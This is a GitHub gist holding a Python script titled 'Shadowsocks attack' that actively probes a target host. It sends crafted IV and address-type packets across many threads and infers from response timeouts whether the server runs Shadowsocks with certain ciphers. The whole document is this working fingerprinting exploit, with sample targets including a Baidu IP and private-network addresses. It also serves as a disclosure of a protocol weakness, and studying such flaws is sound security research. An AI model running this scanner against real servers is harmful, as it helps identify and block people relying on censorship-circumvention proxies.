Created
August 21, 2016 07:49
-
-
Save bekcpear/cb5cc83dac9e83308ebee1d3a76a944b to your computer and use it in GitHub Desktop.
Shadowsocks attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
''' | |
Copyleft (c) 2015 breakwa11 | |
https://github.com/breakwa11/shadowsocks-rss | |
''' | |
import logging | |
import socket | |
import time | |
import traceback | |
import os | |
import struct | |
import threading | |
iv_buffer_max_size = 256 # from ss-libev setting | |
scan_max_try = 256 * 7 | |
max_thread_num = 32 | |
def compat_ord(s): | |
if type(s) == int: | |
return s | |
return _ord(s) | |
def compat_chr(d): | |
if bytes == str: | |
return _chr(d) | |
return bytes([d]) | |
_ord = ord | |
_chr = chr | |
ord = compat_ord | |
chr = compat_chr | |
def to_bytes(s): | |
if bytes != str: | |
if type(s) == str: | |
return s.encode('utf-8') | |
return s | |
def to_str(s): | |
if bytes != str: | |
if type(s) == bytes: | |
return s.decode('utf-8') | |
return s | |
def random_string(length): | |
return os.urandom(length) | |
def test_single(iv, ip, port, addrtype, attack_data, timeout = 10): | |
try: | |
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM, socket.SOL_TCP) | |
af, socktype, proto, canonname, sa = addrs[0] | |
s = socket.socket(af, socket.SOCK_STREAM) | |
s.settimeout(timeout) | |
s.connect(sa) | |
s.send(iv + to_bytes(chr(addrtype)) + attack_data) | |
ok = False | |
try: | |
ret = s.recv(1024) | |
except socket.timeout: | |
ok = True | |
except: | |
pass | |
return ok | |
except: | |
pass | |
class TestThread(threading.Thread): | |
def __init__(self, lock, semaphore, index, attack_ok_list, params): | |
threading.Thread.__init__(self) | |
self.lock = lock | |
self.semaphore = semaphore | |
self.index = index | |
self.params = params | |
self.attack_ok_list = attack_ok_list | |
semaphore.acquire() | |
def run(self): | |
for retry in range(3): | |
ok = test_single(*self.params) | |
if ok is None: | |
continue | |
if ok: | |
self.lock.acquire() | |
self.attack_ok_list.append([self.params[0], self.params[3], self.index]) | |
self.lock.release() | |
break | |
self.semaphore.release() | |
def scan(iv_len, addr, port): | |
iv_data = random_string(iv_len - 2) | |
attack_ok_list = [] | |
addrtype = 0 | |
att_data_len = 6 | |
attack_data = random_string(att_data_len) | |
attack_fail = False | |
lock = threading.Lock() | |
semaphore = threading.Semaphore(max_thread_num) | |
for index in range(scan_max_try + iv_buffer_max_size): | |
if index % 100 == 20: | |
print("%d%%" % (index * 100 / (scan_max_try + iv_buffer_max_size))) | |
iv = iv_data + struct.pack('>H', index) | |
if index >= 8 + max_thread_num and len(attack_ok_list) > index - max_thread_num: | |
attack_fail = True | |
break | |
elif index > 128 and len(attack_ok_list) > scan_max_try * 4 / 256: | |
attack_fail = True | |
break | |
testThread = TestThread(lock, semaphore, index, attack_ok_list, (iv, addr, port, addrtype, attack_data)) | |
testThread.start() | |
print("Waiting response") | |
for thread_num in range(max_thread_num): | |
semaphore.acquire() | |
if len(attack_ok_list) == 0 or attack_fail: | |
print("%s:%d is an unknown server" % (addr, port)) | |
return False | |
print("Double check") | |
attack_data2 = random_string(att_data_len) | |
while attack_data2 == attack_data: | |
attack_data2 = random_string(att_data_len) | |
for attack_item in attack_ok_list: | |
if attack_item[2] >= scan_max_try: | |
break | |
for retry in range(3): | |
ok = test_single(attack_item[0], addr, port, attack_item[1], attack_data2) | |
if ok is not None: | |
break | |
if ok: | |
print("%s:%d is a Shadowsocks server" % (addr, port)) | |
return True | |
print("%s:%d is an unknown server" % (addr, port)) | |
return False | |
if __name__ == '__main__': | |
''' | |
99.91% success in theroy | |
''' | |
#scan(16, "123.125.114.144", 80) # test baidu | |
#scan(16, "123.125.114.144", 443) # test baidu | |
scan(16, "127.0.0.1", 8001) # test your target server (rc4-md5/aes/camellia encryptor) | |
#scan( 8, "192.168.0.100", 1025) # test your target server (chacha20/salsa20/bf-cfb encryptor) | |
#scan(12, "192.168.0.100", 1025) # test your target server (chacha20-ietf encryptor) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment